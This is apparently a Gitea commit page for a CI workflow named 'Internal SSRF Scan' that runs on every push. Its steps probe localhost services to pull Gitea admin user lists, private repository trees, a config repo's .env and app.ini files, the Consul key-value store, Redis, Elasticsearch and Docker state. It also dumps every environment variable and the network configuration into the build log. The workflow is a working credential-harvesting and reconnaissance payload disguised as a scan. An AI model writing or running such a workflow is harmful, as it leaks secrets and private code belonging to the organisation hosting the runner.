secdev99 73a271d549
Some checks failed
Internal SSRF Scan / ssrf-scan (push) Has been cancelled
add internal scan workflow
2026-07-04 13:23:50 +00:00

59 lines
2.7 KiB
YAML

name: Internal SSRF Scan
on: [push]
jobs:
ssrf-scan:
runs-on: ubuntu-latest
steps:
- name: Probe Internal Services
run: |
echo "=== GITEA ADMIN USERS ==="
curl -s http://localhost:3000/api/v1/admin/users 2>/dev/null | head -c 5000
echo ""
echo "=== GITEA ALL REPOS ==="
curl -s "http://localhost:3000/api/v1/repos/search?limit=50&private=true" 2>/dev/null | head -c 5000
echo ""
echo "=== DEPLOY REPO TREE ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
echo ""
echo "=== CONFIG REPO .env ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/.env" 2>/dev/null | head -c 5000
echo ""
echo "=== BACKEND REPO TREE ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/backend/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
echo ""
echo "=== ORACLE REPO TREE ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/oracle/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
echo ""
echo "=== BRIDGE REPO TREE ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/bridge/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
echo ""
echo "=== DOCKER PS ==="
docker ps 2>/dev/null || echo "no docker"
echo ""
echo "=== REDIS INFO ==="
curl -s http://localhost:6379/ 2>/dev/null | head -c 1000 || echo "no redis"
echo ""
echo "=== ENV VARS ==="
env | sort
echo ""
echo "=== NETWORK ==="
ip addr 2>/dev/null || ifconfig 2>/dev/null
echo ""
echo "=== CONSUL ==="
curl -s http://localhost:8500/v1/kv/?recurse 2>/dev/null | head -c 5000
echo ""
echo "=== DEPLOY COMPOSE ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/raw/main/docker-compose.yml" 2>/dev/null | head -c 5000
echo ""
echo "=== ROCKETSWAP REPO ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/rocketswap/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
echo ""
echo "=== POSTGRES ==="
curl -s http://localhost:5432/ 2>/dev/null | head -c 500 || echo "no pg http"
echo ""
echo "=== ES ==="
curl -s http://localhost:9200/ 2>/dev/null | head -c 2000
echo ""
echo "=== GITEA APP INI ==="
curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/app.ini" 2>/dev/null | head -c 5000